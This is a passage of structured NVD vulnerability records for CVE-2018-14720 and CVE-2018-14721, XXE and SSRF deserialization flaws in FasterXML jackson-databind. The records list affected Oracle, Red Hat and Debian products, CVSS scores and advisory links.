"CWE-502", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2019-01-02 18:29
Modified
2024-11-21 03:49
Severity ?
Summary
FasterXML jackson-databind 2.x before 2.9.7 might allow attackers to conduct external XML entity (XXE) attacks by leveraging failure to block unspecified JDK classes from polymorphic deserialization.
References
Impacted products
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "A1BA8F04-46A7-4804-A997-59080034013F", versionEndExcluding: "2.6.7.2", versionStartIncluding: "2.6.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "B99066EB-FF79-4D9D-9466-B04AD4D3A814", versionEndExcluding: "2.7.9.5", versionStartIncluding: "2.7.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "F4D3858C-DAF3-4522-90EC-EFCD13BD121E", versionEndExcluding: "2.8.11.3", versionStartIncluding: "2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "4DA01839-5250-43A7-AFB7-871DC9B8AB32", versionEndExcluding: "2.9.7", versionStartIncluding: "2.9.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.7.0:rc1:*:*:*:*:*:*", matchCriteriaId: "C43DF125-AD83-4402-BF82-72542F898D6D", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.7.0:rc2:*:*:*:*:*:*", matchCriteriaId: "E2DD9CB6-7456-417A-A816-32BD8EC5FA83", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.7.0:rc3:*:*:*:*:*:*", matchCriteriaId: "80428392-1050-4980-BF13-49CE32F96478", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.8.0:rc1:*:*:*:*:*:*", matchCriteriaId: "ADA0D863-2917-4E7B-8FF6-B499180D2D4C", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.8.0:rc2:*:*:*:*:*:*", matchCriteriaId: "ED1E9904-73E0-45F3-86A9-6173EE67E74D", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.9.0:pr1:*:*:*:*:*:*", matchCriteriaId: "B1618FF9-0FDC-44BA-9FDA-5EA843C0D2D5", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.9.0:pr2:*:*:*:*:*:*", matchCriteriaId: "3FEDB0BC-FE4C-4851-A142-96767E337898", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.9.0:pr3:*:*:*:*:*:*", matchCriteriaId: "75836E44-81A6-42C0-A589-A990887C7F9B", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.9.0:pr4:*:*:*:*:*:*", matchCriteriaId: "F794F46D-8B49-43FE-9EE0-4ECD20F9BCB0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", matchCriteriaId: "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", vulnerable: true, }, { criteria: "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", matchCriteriaId: "DEECE5FC-CACF-4496-A3E7-164736409252", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:banking_platform:2.5.0:*:*:*:*:*:*:*", matchCriteriaId: "35AD0C07-9688-4397-8D45-FBB88C0F0C11", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*", matchCriteriaId: "8972497F-6E24-45A9-9A18-EB0E842CB1D4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*", matchCriteriaId: "400509A8-D6F2-432C-A2F1-AD5B8778D0D9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", matchCriteriaId: "132CE62A-FBFC-4001-81EC-35D81F73AF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5:*:*:*:*:*:*:*", matchCriteriaId: "E6039DC7-08F2-4DD9-B5B5-B6B22DD2409F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0:*:*:*:*:*:*:*", matchCriteriaId: "7231AF76-3D46-41C4-83E9-6E9E12940BD9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.2.2:*:*:*:*:*:*:*", matchCriteriaId: "A9E97F04-00ED-48E9-AB40-7A02B3419641", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.2.3:*:*:*:*:*:*:*", matchCriteriaId: "FCCE5A11-39E7-4BBB-9E1A-BA4B754103BB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.3.1:*:*:*:*:*:*:*", matchCriteriaId: "A5AEC7F5-C353-4CF5-96CE-8C713A2B0C92", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.2:*:*:*:*:*:*:*", matchCriteriaId: "BB79BB43-E0AB-4F0D-A6EA-000485757EEC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.3:*:*:*:*:*:*:*", matchCriteriaId: "F238CB66-886D-47E8-8DC0-7FC2025771EB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.4:*:*:*:*:*:*:*", matchCriteriaId: "59B7B8AD-1210-4C40-8EF7-E2E8156630A1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.5:*:*:*:*:*:*:*", matchCriteriaId: "0DE4A291-4358-42A9-A68D-E59D9998A1CC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "0D19CF00-FE20-4690-AAB7-8E9DBC68A94F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "A030A498-3361-46F8-BB99-24A66CAE11CA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "042C243F-EDFE-4A04-AB0B-26E73CC34837", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*", matchCriteriaId: "B8249A74-C34A-4F66-8F11-F7F50F8813BF", versionEndIncluding: "17.12", versionStartIncluding: "17.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", matchCriteriaId: "D55A54FD-7DD1-49CD-BE81-0BE73990943C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", matchCriteriaId: "82EB08C0-2D46-4635-88DF-E54F6452D3A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", matchCriteriaId: "202AD518-2E9B-4062-B063-9858AE1F9CE2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*", matchCriteriaId: "792DF04A-2D1B-40B5-B960-3E7152732EB8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_merchandising_system:16.0:*:*:*:*:*:*:*", matchCriteriaId: "46525CA6-4226-4F6F-B899-D800D4DDE0B5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "D6A4F71A-4269-40FC-8F61-1D1301F2B728", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.2.0:*:*:*:*:*:*:*", matchCriteriaId: "0952BA1A-5DF9-400F-B01F-C3A398A8A2D4", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*", matchCriteriaId: "2F87326E-0B56-4356-A889-73D026DB1D4B", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "FasterXML jackson-databind 2.x before 2.9.7 might allow attackers to conduct external XML entity (XXE) attacks by leveraging failure to block unspecified JDK classes from polymorphic deserialization.", }, { lang: "es", value: "Las versiones 2.x de FasterXML jackson-databind anteriores a la 2.9.7 podrían permitir a los atacantes realizar ataques de tipo XML External Entity Injection (XXE) aprovechando su incapacidad de bloquear clases JDK no especificadas de deserialización polimórfica.", }, ], id: "CVE-2018-14720", lastModified: "2024-11-21T03:49:40.270", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "HIGH", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV30: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.0", }, exploitabilityScore: 3.9, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2019-01-02T18:29:00.467", references: [ { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1106", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1107", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1108", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1140", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { source: "cve@mitre.org", url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { source: "cve@mitre.org", url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { source: "cve@mitre.org", url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { source: "cve@mitre.org", url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { source: "cve@mitre.org", tags: [ "Patch", "Release Notes", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286%40%3Cdev.lucene.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f%40%3Cdev.lucene.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df%40%3Cdev.lucene.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { source: "cve@mitre.org", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "cve@mitre.org", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1106", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1107", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1108", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1140", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Release Notes", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286%40%3Cdev.lucene.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f%40%3Cdev.lucene.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df%40%3Cdev.lucene.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-502", }, { lang: "en", value: "CWE-611", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2019-01-02 18:29
Modified
2024-11-21 03:49
Severity ?
Summary
FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to conduct server-side request forgery (SSRF) attacks by leveraging failure to block the axis2-jaxws class from polymorphic deserialization.
References
Impacted products
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "A1BA8F04-46A7-4804-A997-59080034013F", versionEndExcluding: "2.6.7.2", versionStartIncluding: "2.6.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "B99066EB-FF79-4D9D-9466-B04AD4D3A814", versionEndExcluding: "2.7.9.5", versionStartIncluding: "2.7.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "F4D3858C-DAF3-4522-90EC-EFCD13BD121E", versionEndExcluding: "2.8.11.3", versionStartIncluding: "2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "4DA01839-5250-43A7-AFB7-871DC9B8AB32", versionEndExcluding: "2.9.7", versionStartIncluding: "2.9.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.7.0:rc1:*:*:*:*:*:*", matchCriteriaId: "C43DF125-AD83-4402-BF82-72542F898D6D", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.7.0:rc2:*:*:*:*:*:*", matchCriteriaId: "E2DD9CB6-7456-417A-A816-32BD8EC5FA83", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.7.0:rc3:*:*:*:*:*:*", matchCriteriaId: "80428392-1050-4980-BF13-49CE32F96478", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.8.0:rc1:*:*:*:*:*:*", matchCriteriaId: "ADA0D863-2917-4E7B-8FF6-B499180D2D4C", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.8.0:rc2:*:*:*:*:*:*", matchCriteriaId: "ED1E9904-73E0-45F3-86A9-6173EE67E74D", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.9.0:pr1:*:*:*:*:*:*", matchCriteriaId: "B1618FF9-0FDC-44BA-9FDA-5EA843C0D2D5", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.9.0:pr2:*:*:*:*:*:*", matchCriteriaId: "3FEDB0BC-FE4C-4851-A142-96767E337898", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.9.0:pr3:*:*:*:*:*:*", matchCriteriaId: "75836E44-81A6-42C0-A589-A990887C7F9B", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:2.9.0:pr4:*:*:*:*:*:*", matchCriteriaId: "F794F46D-8B49-43FE-9EE0-4ECD20F9BCB0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", matchCriteriaId: "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", vulnerable: true, }, { criteria: "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", matchCriteriaId: "DEECE5FC-CACF-4496-A3E7-164736409252", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:banking_platform:2.5.0:*:*:*:*:*:*:*", matchCriteriaId: "35AD0C07-9688-4397-8D45-FBB88C0F0C11", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*", matchCriteriaId: "8972497F-6E24-45A9-9A18-EB0E842CB1D4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*", matchCriteriaId: "400509A8-D6F2-432C-A2F1-AD5B8778D0D9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", matchCriteriaId: "132CE62A-FBFC-4001-81EC-35D81F73AF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5:*:*:*:*:*:*:*", matchCriteriaId: "E6039DC7-08F2-4DD9-B5B5-B6B22DD2409F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0:*:*:*:*:*:*:*", matchCriteriaId: "7231AF76-3D46-41C4-83E9-6E9E12940BD9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.2.2:*:*:*:*:*:*:*", matchCriteriaId: "A9E97F04-00ED-48E9-AB40-7A02B3419641", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.2.3:*:*:*:*:*:*:*", matchCriteriaId: "FCCE5A11-39E7-4BBB-9E1A-BA4B754103BB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.3.1:*:*:*:*:*:*:*", matchCriteriaId: "A5AEC7F5-C353-4CF5-96CE-8C713A2B0C92", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.2:*:*:*:*:*:*:*", matchCriteriaId: "BB79BB43-E0AB-4F0D-A6EA-000485757EEC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.3:*:*:*:*:*:*:*", matchCriteriaId: "F238CB66-886D-47E8-8DC0-7FC2025771EB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.4:*:*:*:*:*:*:*", matchCriteriaId: "59B7B8AD-1210-4C40-8EF7-E2E8156630A1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.5:*:*:*:*:*:*:*", matchCriteriaId: "0DE4A291-4358-42A9-A68D-E59D9998A1CC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "0D19CF00-FE20-4690-AAB7-8E9DBC68A94F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "A030A498-3361-46F8-BB99-24A66CAE11CA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "042C243F-EDFE-4A04-AB0B-26E73CC34837", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*", matchCriteriaId: "B8249A74-C34A-4F66-8F11-F7F50F8813BF", versionEndIncluding: "17.12", versionStartIncluding: "17.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", matchCriteriaId: "D55A54FD-7DD1-49CD-BE81-0BE73990943C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", matchCriteriaId: "82EB08C0-2D46-4635-88DF-E54F6452D3A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", matchCriteriaId: "202AD518-2E9B-4062-B063-9858AE1F9CE2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*", matchCriteriaId: "792DF04A-2D1B-40B5-B960-3E7152732EB8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_merchandising_system:16.0:*:*:*:*:*:*:*", matchCriteriaId: "46525CA6-4226-4F6F-B899-D800D4DDE0B5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "D6A4F71A-4269-40FC-8F61-1D1301F2B728", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.2.0:*:*:*:*:*:*:*", matchCriteriaId: "0952BA1A-5DF9-400F-B01F-C3A398A8A2D4", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*", matchCriteriaId: "2F87326E-0B56-4356-A889-73D026DB1D4B", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to conduct server-side request forgery (SSRF) attacks by leveraging failure to block the axis2-jaxws class from polymorphic deserialization.", }, { lang: "es", value: "Las versiones 2.x de FasterXML jackson-databind anteriores a la 2.9.7 podrían permitir a los atacantes remotos realizar ataques de SSRF (Server-Side Request Forgery) aprovechando un fallo para bloquear la clase axis2-ext de deserialización polimórfica.", }, ], id: "CVE-2018-14721", lastModified: "2024-11-21T03:49:40.523", metrics: { 